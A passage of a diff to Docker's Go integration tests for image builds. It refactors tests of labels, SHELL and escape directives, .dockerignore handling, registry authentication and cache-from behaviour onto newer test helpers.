 func (s *DockerSuite) TestBuildFailsGitNotCallable(c *check.C) {
-	cmd := exec.Command(dockerBinary, "build", "github.com/docker/v1.10-migrator.git")
-	cmd.Env = append(cmd.Env, "PATH=")
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ")
+	buildImage("gitnotcallable", cli.WithEnvironmentVariables("PATH="),
+		build.WithContextPath("github.com/docker/v1.10-migrator.git")).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "unable to prepare context: unable to find 'git': ",
+	})
 
-	cmd = exec.Command(dockerBinary, "build", "https://github.com/docker/v1.10-migrator.git")
-	cmd.Env = append(cmd.Env, "PATH=")
-	out, _, err = runCommandWithOutput(cmd)
-	c.Assert(err, checker.NotNil)
-	c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ")
+	buildImage("gitnotcallable", cli.WithEnvironmentVariables("PATH="),
+		build.WithContextPath("https://github.com/docker/v1.10-migrator.git")).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "unable to prepare context: unable to find 'git': ",
+	})
 }
 
 // TestBuildWorkdirWindowsPath tests that a Windows style path works as a workdir
 func (s *DockerSuite) TestBuildWorkdirWindowsPath(c *check.C) {
 	testRequires(c, DaemonIsWindows)
 	name := "testbuildworkdirwindowspath"
-
-	_, err := buildImage(name, `
-	FROM `+WindowsBaseImage+`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
+	FROM `+testEnv.PlatformDefaults.BaseImage+`
 	RUN mkdir C:\\work
 	WORKDIR C:\\work
 	RUN if "%CD%" NEQ "C:\work" exit -1
-	`, true)
-
-	if err != nil {
-		c.Fatal(err)
-	}
+	`))
 }
 
 func (s *DockerSuite) TestBuildLabel(c *check.C) {
 	name := "testbuildlabel"
 	testLabel := "foo"
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", testLabel),
+		build.WithDockerfile(`
   FROM `+minimalBaseImage()+`
   LABEL default foo
-`, false, "--label", testLabel)
-
-	c.Assert(err, checker.IsNil)
-
-	res := inspectFieldJSON(c, name, "Config.Labels")
+`))
 
 	var labels map[string]string
-
-	if err := json.Unmarshal([]byte(res), &labels); err != nil {
-		c.Fatal(err)
-	}
-
+	inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels)
 	if _, ok := labels[testLabel]; !ok {
 		c.Fatal("label not found in image")
 	}
@@ -6459,19 +4940,11 @@ func (s *DockerSuite) TestBuildLabel(c *check.C) {
 
 func (s *DockerSuite) TestBuildLabelOneNode(c *check.C) {
 	name := "testbuildlabel"
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=bar"),
+		build.WithDockerfile("FROM busybox"))
 
-	_, err := buildImage(name, "FROM busybox", false, "--label", "foo=bar")
-
-	c.Assert(err, checker.IsNil)
-
-	res, err := inspectImage(name, "json .Config.Labels")
-	c.Assert(err, checker.IsNil)
 	var labels map[string]string
-
-	if err := json.Unmarshal([]byte(res), &labels); err != nil {
-		c.Fatal(err)
-	}
-
+	inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels)
 	v, ok := labels["foo"]
 	if !ok {
 		c.Fatal("label `foo` not found in image")
@@ -6483,28 +4956,18 @@ func (s *DockerSuite) TestBuildLabelCacheCommit(c *check.C) {
 	name := "testbuildlabelcachecommit"
 	testLabel := "foo"
 
-	if _, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM `+minimalBaseImage()+`
   LABEL default foo
-  `, false); err != nil {
-		c.Fatal(err)
-	}
-
-	_, err := buildImage(name, `
+  `))
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", testLabel),
+		build.WithDockerfile(`
   FROM `+minimalBaseImage()+`
   LABEL default foo
-`, true, "--label", testLabel)
-
-	c.Assert(err, checker.IsNil)
-
-	res := inspectFieldJSON(c, name, "Config.Labels")
+  `))
 
 	var labels map[string]string
-
-	if err := json.Unmarshal([]byte(res), &labels); err != nil {
-		c.Fatal(err)
-	}
-
+	inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels)
 	if _, ok := labels[testLabel]; !ok {
 		c.Fatal("label not found in image")
 	}
@@ -6516,30 +4979,19 @@ func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) {
 		"foo": "bar",
 		"123": "456",
 	}
-
-	labelArgs := []string{}
-
+	var labelArgs []string
 	for k, v := range testLabels {
 		labelArgs = append(labelArgs, "--label", k+"="+v)
 	}
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, cli.WithFlags(labelArgs...),
+		build.WithDockerfile(`
   FROM `+minimalBaseImage()+`
   LABEL default foo
-`, false, labelArgs...)
-
-	if err != nil {
-		c.Fatal("error building image with labels", err)
-	}
-
-	res := inspectFieldJSON(c, name, "Config.Labels")
+`))
 
 	var labels map[string]string
-
-	if err := json.Unmarshal([]byte(res), &labels); err != nil {
-		c.Fatal(err)
-	}
-
+	inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels)
 	for k, v := range testLabels {
 		if x, ok := labels[k]; !ok || x != v {
 			c.Fatalf("label %s=%s not found in image", k, v)
@@ -6547,59 +4999,22 @@ func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) {
 	}
 }
 
-func (s *DockerSuite) TestBuildLabelOverwrite(c *check.C) {
-	name := "testbuildlabeloverwrite"
-	testLabel := "foo"
-	testValue := "bar"
-
-	_, err := buildImage(name, `
-  FROM `+minimalBaseImage()+`
-  LABEL `+testLabel+`+ foo
-`, false, []string{"--label", testLabel + "=" + testValue}...)
-
-	if err != nil {
-		c.Fatal("error building image with labels", err)
-	}
-
-	res := inspectFieldJSON(c, name, "Config.Labels")
-
-	var labels map[string]string
-
-	if err := json.Unmarshal([]byte(res), &labels); err != nil {
-		c.Fatal(err)
-	}
-
-	v, ok := labels[testLabel]
-	if !ok {
-		c.Fatal("label not found in image")
-	}
-
-	if v != testValue {
-		c.Fatal("label not overwritten")
-	}
-}
-
 func (s *DockerRegistryAuthHtpasswdSuite) TestBuildFromAuthenticatedRegistry(c *check.C) {
-	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
-
+	dockerCmd(c, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
 	baseImage := privateRegistryURL + "/baseimage"
 
-	_, err := buildImage(baseImage, `
+	buildImageSuccessfully(c, baseImage, build.WithDockerfile(`
 	FROM busybox
 	ENV env1 val1
-	`, true)
-
-	c.Assert(err, checker.IsNil)
+	`))
 
 	dockerCmd(c, "push", baseImage)
 	dockerCmd(c, "rmi", baseImage)
 
-	_, err = buildImage(baseImage, fmt.Sprintf(`
+	buildImageSuccessfully(c, baseImage, build.WithDockerfile(fmt.Sprintf(`
 	FROM %s
 	ENV env2 val2
-	`, baseImage), true)
-
-	c.Assert(err, checker.IsNil)
+	`, baseImage)))
 }
 
 func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) {
@@ -6625,7 +5040,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C)
 	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
 	c.Assert(err, checker.IsNil)
 
-	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
 
 	b, err := ioutil.ReadFile(configPath)
 	c.Assert(err, checker.IsNil)
@@ -6637,11 +5052,10 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C)
 	// make sure the image is pulled when building
 	dockerCmd(c, "rmi", repoName)
 
-	buildCmd := exec.Command(dockerBinary, "--config", tmp, "build", "-")
-	buildCmd.Stdin = strings.NewReader(fmt.Sprintf("FROM %s", repoName))
-
-	out, _, err := runCommandWithOutput(buildCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "--config", tmp, "build", "-"},
+		Stdin:   strings.NewReader(fmt.Sprintf("FROM %s", repoName)),
+	}).Assert(c, icmd.Success)
 }
 
 // Test cases in #22036
@@ -6649,12 +5063,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 	// Command line option labels will always override
 	name := "scratchy"
 	expected := `{"bar":"from-flag","foo":"from-flag"}`
-	_, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
-                LABEL foo=from-dockerfile`,
-		true, "--label", "foo=from-flag", "--label", "bar=from-flag")
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=from-flag", "--label", "bar=from-flag"),
+		build.WithDockerfile(`FROM `+minimalBaseImage()+`
+                LABEL foo=from-dockerfile`))
 	res := inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -6662,12 +5073,8 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 
 	name = "from"
 	expected = `{"foo":"from-dockerfile"}`
-	_, err = buildImage(name,
-		`FROM `+minimalBaseImage()+`
-                LABEL foo from-dockerfile`,
-		true)
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+                LABEL foo from-dockerfile`))
 	res = inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -6676,12 +5083,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 	// Command line option label will override even via `FROM`
 	name = "new"
 	expected = `{"bar":"from-dockerfile2","foo":"new"}`
-	_, err = buildImage(name,
-		`FROM from
-                LABEL bar from-dockerfile2`,
-		true, "--label", "foo=new")
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=new"),
+		build.WithDockerfile(`FROM from
+                LABEL bar from-dockerfile2`))
 	res = inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -6691,12 +5095,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 	// will be treated as --label foo="", --label bar=""
 	name = "scratchy2"
 	expected = `{"bar":"","foo":""}`
-	_, err = buildImage(name,
-		`FROM `+minimalBaseImage()+`
-                LABEL foo=from-dockerfile`,
-		true, "--label", "foo", "--label", "bar=")
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo", "--label", "bar="),
+		build.WithDockerfile(`FROM `+minimalBaseImage()+`
+                LABEL foo=from-dockerfile`))
 	res = inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -6707,12 +5108,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 	// This time is for inherited images
 	name = "new2"
 	expected = `{"bar":"","foo":""}`
-	_, err = buildImage(name,
-		`FROM from
-                LABEL bar from-dockerfile2`,
-		true, "--label", "foo=", "--label", "bar")
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=", "--label", "bar"),
+		build.WithDockerfile(`FROM from
+                LABEL bar from-dockerfile2`))
 	res = inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -6721,11 +5119,8 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 	// Command line option labels with only `FROM`
 	name = "scratchy"
 	expected = `{"bar":"from-flag","foo":"from-flag"}`
-	_, err = buildImage(name,
-		`FROM `+minimalBaseImage(),
-		true, "--label", "foo=from-flag", "--label", "bar=from-flag")
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=from-flag", "--label", "bar=from-flag"),
+		build.WithDockerfile(`FROM `+minimalBaseImage()))
 	res = inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -6734,31 +5129,22 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) {
 	// Command line option labels with env var
 	name = "scratchz"
 	expected = `{"bar":"$PATH"}`
-	_, err = buildImage(name,
-		`FROM `+minimalBaseImage(),
-		true, "--label", "bar=$PATH")
-	c.Assert(err, check.IsNil)
-
+	buildImageSuccessfully(c, name, cli.WithFlags("--label", "bar=$PATH"),
+		build.WithDockerfile(`FROM `+minimalBaseImage()))
 	res = inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
 	}
-
 }
 
 // Test case for #22855
 func (s *DockerSuite) TestBuildDeleteCommittedFile(c *check.C) {
 	name := "test-delete-committed-file"
-
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		RUN echo test > file
 		RUN test -e file
 		RUN rm file
-		RUN sh -c "! test -e file"`, false)
-	if err != nil {
-		c.Fatal(err)
-	}
+		RUN sh -c "! test -e file"`))
 }
 
 // #20083
@@ -6775,13 +5161,14 @@ func (s *DockerSuite) TestBuildDockerignoreComment(c *check.C) {
         RUN sh -c "(ls -la /tmp/#1)"
         RUN sh -c "(! ls -la /tmp/#2)"
         RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (ls /tmp/dir1/foo)"`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"foo":      "foo",
-		"foo2":     "foo2",
-		"dir1/foo": "foo in dir1",
-		"#1":       "# file 1",
-		"#2":       "# file 2",
-		".dockerignore": `# Visual C++ cache files
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile("foo", "foo"),
+		build.WithFile("foo2", "foo2"),
+		build.WithFile("dir1/foo", "foo in dir1"),
+		build.WithFile("#1", "# file 1"),
+		build.WithFile("#2", "# file 2"),
+		build.WithFile(".dockerignore", `# Visual C++ cache files
 # because we have git ;-)
 # The above comment is from #20083
 foo
@@ -6791,15 +5178,7 @@ foo2
 #1
 # The following is not considered as comment as # is not at the beginning
   #2
-`,
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+`)))
 }
 
 // Test case for #23221
@@ -6807,13 +5186,9 @@ func (s *DockerSuite) TestBuildWithUTF8BOM(c *check.C) {
 	name := "test-with-utf8-bom"
 	dockerfile := []byte(`FROM busybox`)
 	bomDockerfile := append([]byte{0xEF, 0xBB, 0xBF}, dockerfile...)
-	ctx, err := fakeContextFromNewTempDir()
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-	err = ctx.addFile("Dockerfile", bomDockerfile)
-	c.Assert(err, check.IsNil)
-	_, err = buildImageFromContext(name, ctx, true)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", string(bomDockerfile)),
+	))
 }
 
 // Test case for UTF-8 BOM in .dockerignore, related to #23221
@@ -6827,31 +5202,19 @@ func (s *DockerSuite) TestBuildWithUTF8BOMDockerignore(c *check.C) {
 		RUN ls /tmp/.dockerignore`
 	dockerignore := []byte("./Dockerfile\n")
 	bomDockerignore := append([]byte{0xEF, 0xBB, 0xBF}, dockerignore...)
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile": dockerfile,
-	})
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-	err = ctx.addFile(".dockerignore", bomDockerignore)
-	c.Assert(err, check.IsNil)
-	_, err = buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", string(bomDockerignore)),
+	))
 }
 
 // #22489 Shell test to confirm config gets updated correctly
 func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) {
 	name := "testbuildshellupdatesconfig"
 
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+        SHELL ["foo", "-bar"]`))
 	expected := `["foo","-bar","#(nop) ","SHELL [foo -bar]"]`
-	_, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
-        SHELL ["foo", "-bar"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
 	res := inspectFieldJSON(c, name, "ContainerConfig.Cmd")
 	if res != expected {
 		c.Fatalf("%s, expected %s", res, expected)
@@ -6866,32 +5229,28 @@ func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) {
 func (s *DockerSuite) TestBuildShellMultiple(c *check.C) {
 	name := "testbuildshellmultiple"
 
-	_, out, _, err := buildImageWithStdoutStderr(name,
-		`FROM busybox
+	result := buildImage(name, build.WithDockerfile(`FROM busybox
 		RUN echo defaultshell
 		SHELL ["echo"]
 		RUN echoshell
 		SHELL ["ls"]
 		RUN -l
-		CMD -l`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		CMD -l`))
+	result.Assert(c, icmd.Success)
 
 	// Must contain 'defaultshell' twice
-	if len(strings.Split(out, "defaultshell")) != 3 {
-		c.Fatalf("defaultshell should have appeared twice in %s", out)
+	if len(strings.Split(result.Combined(), "defaultshell")) != 3 {
+		c.Fatalf("defaultshell should have appeared twice in %s", result.Combined())
 	}
 
 	// Must contain 'echoshell' twice
-	if len(strings.Split(out, "echoshell")) != 3 {
-		c.Fatalf("echoshell should have appeared twice in %s", out)
+	if len(strings.Split(result.Combined(), "echoshell")) != 3 {
+		c.Fatalf("echoshell should have appeared twice in %s", result.Combined())
 	}
 
 	// Must contain "total " (part of ls -l)
-	if !strings.Contains(out, "total ") {
-		c.Fatalf("%s should have contained 'total '", out)
+	if !strings.Contains(result.Combined(), "total ") {
+		c.Fatalf("%s should have contained 'total '", result.Combined())
 	}
 
 	// A container started from the image uses the shell-form CMD.
@@ -6906,15 +5265,9 @@ func (s *DockerSuite) TestBuildShellMultiple(c *check.C) {
 func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) {
 	name := "testbuildshellentrypoint"
 
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		SHELL ["ls"]
-		ENTRYPOINT -l`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+		ENTRYPOINT -l`))
 	// A container started from the image uses the shell-form ENTRYPOINT.
 	// Shell is ls. ENTRYPOINT is -l. So should contain 'total '.
 	outrun, _ := dockerCmd(c, "run", "--rm", name)
@@ -6926,43 +5279,26 @@ func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) {
 // #22489 Shell test to confirm shell is inherited in a subsequent build
 func (s *DockerSuite) TestBuildShellInherited(c *check.C) {
 	name1 := "testbuildshellinherited1"
-	_, err := buildImage(name1,
-		`FROM busybox
-        SHELL ["ls"]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, name1, build.WithDockerfile(`FROM busybox
+        SHELL ["ls"]`))
 	name2 := "testbuildshellinherited2"
-	_, out, _, err := buildImageWithStdoutStderr(name2,
-		`FROM `+name1+`
-        RUN -l`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
-	// ls -l has "total " followed by some number in it, ls without -l does not.
-	if !strings.Contains(out, "total ") {
-		c.Fatalf("Should have seen total in 'ls -l'.\n%s", out)
-	}
+	buildImage(name2, build.WithDockerfile(`FROM `+name1+`
+        RUN -l`)).Assert(c, icmd.Expected{
+		// ls -l has "total " followed by some number in it, ls without -l does not.
+		Out: "total ",
+	})
 }
 
 // #22489 Shell test to confirm non-JSON doesn't work
 func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) {
 	name := "testbuildshellnotjson"
 
-	_, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
+	buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
         sHeLl exec -form`, // Casing explicit to ensure error is upper-cased.
-		true)
-	if err == nil {
-		c.Fatal("Image build should have failed")
-	}
-	if !strings.Contains(err.Error(), "SHELL requires the arguments to be in JSON form") {
-		c.Fatal("Error didn't indicate that arguments must be in JSON form")
-	}
+	)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "SHELL requires the arguments to be in JSON form",
+	})
 }
 
 // #22489 Windows shell test to confirm native is powershell if executing a PS command
@@ -6970,17 +5306,11 @@ func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) {
 func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) {
 	testRequires(c, DaemonIsWindows)
 	name := "testbuildshellpowershell"
-	_, out, err := buildImageWithOut(name,
-		`FROM `+minimalBaseImage()+`
+	buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
         SHELL ["powershell", "-command"]
-		RUN Write-Host John`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(out, "\nJohn\n") {
-		c.Fatalf("Line with 'John' not found in output %q", out)
-	}
+		RUN Write-Host John`)).Assert(c, icmd.Expected{
+		Out: "\nJohn\n",
+	})
 }
 
 // Verify that escape is being correctly applied to words when escape directive is not \.
@@ -6988,48 +5318,32 @@ func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) {
 func (s *DockerSuite) TestBuildEscapeNotBackslashWordTest(c *check.C) {
 	testRequires(c, DaemonIsWindows)
 	name := "testbuildescapenotbackslashwordtesta"
-	_, out, err := buildImageWithOut(name,
-		`# escape= `+"`"+`
+	buildImage(name, build.WithDockerfile(`# escape= `+"`"+`
 		FROM `+minimalBaseImage()+`
         WORKDIR c:\windows
-		RUN dir /w`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(strings.ToLower(out), "[system32]") {
-		c.Fatalf("Line with '[windows]' not found in output %q", out)
-	}
+		RUN dir /w`)).Assert(c, icmd.Expected{
+		Out: "[System32]",
+	})
 
 	name = "testbuildescapenotbackslashwordtestb"
-	_, out, err = buildImageWithOut(name,
-		`# escape= `+"`"+`
+	buildImage(name, build.WithDockerfile(`# escape= `+"`"+`
 		FROM `+minimalBaseImage()+`
 		SHELL ["powershell.exe"]
         WORKDIR c:\foo
 		ADD Dockerfile c:\foo\
-		RUN dir Dockerfile`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(strings.ToLower(out), "-a----") {
-		c.Fatalf("Line with '-a----' not found in output %q", out)
-	}
-
+		RUN dir Dockerfile`)).Assert(c, icmd.Expected{
+		Out: "-a----",
+	})
 }
 
 // #22868. Make sure shell-form CMD is marked as escaped in the config of the image
 func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) {
 	testRequires(c, DaemonIsWindows)
 	name := "testbuildcmdshellescaped"
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
   FROM `+minimalBaseImage()+`
   CMD "ipconfig"
-  `, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+  `))
 	res := inspectFieldJSON(c, name, "Config.ArgsEscaped")
 	if res != "true" {
 		c.Fatalf("CMD did not update Config.ArgsEscaped on image: %v", res)
@@ -7046,13 +5360,12 @@ func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) {
 // Test case for #24912.
 func (s *DockerSuite) TestBuildStepsWithProgress(c *check.C) {
 	name := "testbuildstepswithprogress"
-
 	totalRun := 5
-	_, out, err := buildImageWithOut(name, "FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun), true)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun))
+	result := buildImage(name, build.WithDockerfile("FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun)))
+	result.Assert(c, icmd.Success)
+	c.Assert(result.Combined(), checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun))
 	for i := 2; i <= 1+totalRun; i++ {
-		c.Assert(out, checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun))
+		c.Assert(result.Combined(), checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun))
 	}
 }
 
@@ -7060,18 +5373,40 @@ func (s *DockerSuite) TestBuildWithFailure(c *check.C) {
 	name := "testbuildwithfailure"
 
 	// First test case can only detect `nobody` in runtime so all steps will show up
-	buildCmd := "FROM busybox\nRUN nobody"
-	_, stdout, _, err := buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm")
-	c.Assert(err, checker.NotNil)
-	c.Assert(stdout, checker.Contains, "Step 1/2 : FROM busybox")
-	c.Assert(stdout, checker.Contains, "Step 2/2 : RUN nobody")
+	dockerfile := "FROM busybox\nRUN nobody"
+	result := buildImage(name, build.WithDockerfile(dockerfile))
+	c.Assert(result.Error, checker.NotNil)
+	c.Assert(result.Stdout(), checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(result.Stdout(), checker.Contains, "Step 2/2 : RUN nobody")
 
 	// Second test case `FFOM` should have been detected before build runs so no steps
-	buildCmd = "FFOM nobody\nRUN nobody"
-	_, stdout, _, err = buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm")
-	c.Assert(err, checker.NotNil)
-	c.Assert(stdout, checker.Not(checker.Contains), "Step 1/2 : FROM busybox")
-	c.Assert(stdout, checker.Not(checker.Contains), "Step 2/2 : RUN nobody")
+	dockerfile = "FFOM nobody\nRUN nobody"
+	result = buildImage(name, build.WithDockerfile(dockerfile))
+	c.Assert(result.Error, checker.NotNil)
+	c.Assert(result.Stdout(), checker.Not(checker.Contains), "Step 1/2 : FROM busybox")
+	c.Assert(result.Stdout(), checker.Not(checker.Contains), "Step 2/2 : RUN nobody")
+}
+
+func (s *DockerSuite) TestBuildCacheFromEqualDiffIDsLength(c *check.C) {
+	dockerfile := `
+		FROM busybox
+		RUN echo "test"
+		ENTRYPOINT ["sh"]`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"Dockerfile": dockerfile,
+		}))
+	defer ctx.Close()
+
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, "build1")
+
+	// rebuild with cache-from
+	result := cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, "build2")
+	c.Assert(id1, checker.Equals, id2)
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2)
 }
 
 func (s *DockerSuite) TestBuildCacheFrom(c *check.C) {
@@ -7081,29 +5416,30 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) {
 		ENV FOO=bar
 		ADD baz /
 		RUN touch bax`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"Dockerfile": dockerfile,
-		"baz":        "baz",
-	})
-	c.Assert(err, checker.IsNil)
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"Dockerfile": dockerfile,
+			"baz":        "baz",
+		}))
 	defer ctx.Close()
 
-	id1, err := buildImageFromContext("build1", ctx, true)
-	c.Assert(err, checker.IsNil)
+	cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, "build1")
 
 	// rebuild with cache-from
-	id2, out, err := buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1")
-	c.Assert(err, checker.IsNil)
+	result := cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, "build2")
 	c.Assert(id1, checker.Equals, id2)
-	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3)
-	dockerCmd(c, "rmi", "build2")
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3)
+	cli.DockerCmd(c, "rmi", "build2")
 
 	// no cache match with unknown source
-	id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=nosuchtag")
-	c.Assert(err, checker.IsNil)
+	result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=nosuchtag"), build.WithExternalBuildContext(ctx))
+	id2 = getIDByName(c, "build2")
 	c.Assert(id1, checker.Not(checker.Equals), id2)
-	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 0)
-	dockerCmd(c, "rmi", "build2")
+	c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 0)
+	cli.DockerCmd(c, "rmi", "build2")
 
 	// clear parent images
 	tempDir, err := ioutil.TempDir("", "test-build-cache-from-")
@@ -7112,31 +5448,31 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) {
 	}
 	defer os.RemoveAll(tempDir)
 	tempFile := filepath.Join(tempDir, "img.tar")
-	dockerCmd(c, "save", "-o", tempFile, "build1")
-	dockerCmd(c, "rmi", "build1")
-	dockerCmd(c, "load", "-i", tempFile)
-	parentID, _ := dockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1")
+	cli.DockerCmd(c, "save", "-o", tempFile, "build1")
+	cli.DockerCmd(c, "rmi", "build1")
+	cli.DockerCmd(c, "load", "-i", tempFile)
+	parentID := cli.DockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1").Combined()
 	c.Assert(strings.TrimSpace(parentID), checker.Equals, "")
 
 	// cache still applies without parents
